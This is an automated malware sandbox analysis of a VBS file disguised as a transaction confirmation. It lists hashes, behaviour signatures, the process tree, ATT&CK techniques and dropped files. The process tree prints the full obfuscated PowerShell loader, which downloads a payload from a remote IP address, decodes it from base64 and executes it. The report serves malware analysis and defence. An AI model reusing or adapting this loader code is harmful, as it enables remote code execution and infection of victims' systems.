Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 07:06

General

  • Target

    Transaction_Execution_Confirmation_000000.vbs

  • Size

    187KB

  • MD5

    37f090cc76db33c457b77c6b2c6bb13d

  • SHA1

    7c499fca1564ea4fb48cc2b72212bc3f857443ab

  • SHA256

    36e517cbfb12bd2e58446d7ae27d76baf3e454a793e8c629667fe067839ec23f

  • SHA512

    90aeb5b01c9309c49f35541d97f7532ed7a564fee986bf111a6f33bb41339e54f9972368179632ee5d6bdd8840811dc665a56ff5a26b159bbe764279f7be0de3

  • SSDEEP

    3072:VmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZJ:V08GxbKja3+DCbKCvBB/WnHXC/sLJFJW

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transaction_Execution_Confirmation_000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1244
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"
        3⤵
          PID:3580
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5024
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"
            4⤵
              PID:3440
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4968
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3608 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:3400

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ehss3xsj.r1m.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Posteriormost.Heb
          Filesize

          469KB

          MD5

          3f23a530f6d6ccaa63bae1e6741b03f6

          SHA1

          363207a5637e5bb7b2a7d7ba933661562cfaf506

          SHA256

          c2fbb6039b145b52d429bcaf5ffb57cc83951c8032e06edfc19bb36dfe5bdede

          SHA512

          b88ecae312e9dbd2dbf409b9097434968999dcf44ddf4257937725682ecb5e233b3a4fb676ebcef5bd36b072bb8feb7f3c7f3c1bcbc0d9b55610287d4bb9da31

        • memory/1244-4-0x00007FFE5F413000-0x00007FFE5F415000-memory.dmp
          Filesize

          8KB

        • memory/1244-10-0x0000023B658F0000-0x0000023B65912000-memory.dmp
          Filesize

          136KB

        • memory/1244-15-0x00007FFE5F410000-0x00007FFE5FED1000-memory.dmp
          Filesize

          10.8MB

        • memory/1244-16-0x00007FFE5F410000-0x00007FFE5FED1000-memory.dmp
          Filesize

          10.8MB

        • memory/1244-17-0x00007FFE5F410000-0x00007FFE5FED1000-memory.dmp
          Filesize

          10.8MB

        • memory/1244-20-0x00007FFE5F413000-0x00007FFE5F415000-memory.dmp
          Filesize

          8KB

        • memory/1244-21-0x00007FFE5F410000-0x00007FFE5FED1000-memory.dmp
          Filesize

          10.8MB

        • memory/5024-24-0x00000000055F0000-0x0000000005612000-memory.dmp
          Filesize

          136KB

        • memory/5024-39-0x0000000007EC0000-0x000000000853A000-memory.dmp
          Filesize

          6.5MB

        • memory/5024-25-0x0000000005F90000-0x0000000005FF6000-memory.dmp
          Filesize

          408KB

        • memory/5024-26-0x0000000006000000-0x0000000006066000-memory.dmp
          Filesize

          408KB

        • memory/5024-36-0x0000000006170000-0x00000000064C4000-memory.dmp
          Filesize

          3.3MB

        • memory/5024-37-0x00000000065E0000-0x00000000065FE000-memory.dmp
          Filesize

          120KB

        • memory/5024-38-0x00000000066B0000-0x00000000066FC000-memory.dmp
          Filesize

          304KB

        • memory/5024-23-0x00000000058F0000-0x0000000005F18000-memory.dmp
          Filesize

          6.2MB

        • memory/5024-40-0x0000000006BE0000-0x0000000006BFA000-memory.dmp
          Filesize

          104KB

        • memory/5024-41-0x0000000007980000-0x0000000007A16000-memory.dmp
          Filesize

          600KB

        • memory/5024-42-0x00000000078E0000-0x0000000007902000-memory.dmp
          Filesize

          136KB

        • memory/5024-43-0x0000000008AF0000-0x0000000009094000-memory.dmp
          Filesize

          5.6MB

        • memory/5024-22-0x0000000002CC0000-0x0000000002CF6000-memory.dmp
          Filesize

          216KB

        • memory/5024-46-0x00000000090A0000-0x000000000C654000-memory.dmp
          Filesize

          53.7MB